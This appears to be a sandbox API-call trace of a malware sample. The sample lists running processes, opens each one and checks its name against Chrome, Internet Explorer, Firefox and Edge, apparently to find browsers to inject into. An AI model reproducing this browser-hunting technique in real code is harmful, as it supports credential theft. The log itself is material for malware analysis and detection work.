	[0203.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0203.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x25c8
	[0203.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.480] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0203.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.480] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.480] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0203.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.480] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.481] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0203.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x25cc
	[0203.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.481] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.482] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.482] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.482] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x25d0
	[0203.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.483] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.483] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.484] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.484] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x25d4
	[0203.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.485] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.486] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.486] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x25d8
	[0203.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.488] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.488] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.489] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.489] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x25dc
	[0203.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.490] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.490] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.490] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.490] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.491] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.491] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x25e0
	[0203.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.491] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.492] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.492] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.492] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.493] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x25e4
	[0203.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.493] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.494] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.494] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.494] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.495] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x25e8
	[0203.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.495] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.496] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.496] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.496] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.497] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0203.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x25ec
	[0203.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.497] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0203.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.498] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.498] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0203.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.498] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.498] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x25f0
	[0203.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.499] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.500] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.500] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.500] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.500] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0203.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x25f4
	[0203.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.501] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.502] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.502] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.502] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.502] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0203.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x25f8
	[0203.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0203.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0203.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.507] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0203.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x25fc
	[0203.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.508] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0203.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.508] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.508] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0203.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.509] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.509] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0203.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2600
	[0203.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.510] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0203.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.510] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.510] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0203.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.511] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.511] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0203.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2604
	[0203.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.512] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0203.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.512] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.512] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0203.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.513] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.513] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0203.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2608
	[0203.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.514] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0203.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.514] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.514] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0203.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.514] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0203.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x260c
	[0203.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.515] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0203.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.516] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.516] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0203.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.516] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0203.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0203.517] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0203.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2610
	[0203.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.518] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0203.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.519] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.520] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0203.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.521] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.521] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0203.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2614
	[0203.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.522] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0203.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.522] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.522] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0203.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.523] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.523] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0203.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2618
	[0203.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.524] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0203.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.524] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.524] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0203.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.525] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.525] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0203.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x261c
	[0203.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.526] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0203.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.526] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.526] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0203.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.527] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.527] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0203.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2620
	[0203.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.528] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0203.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.528] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.529] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0203.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.529] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0203.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2624
	[0203.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.530] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0203.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.531] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0203.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.531] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0203.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.531] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0203.531] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0203.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2628
	[0203.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0203.532] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
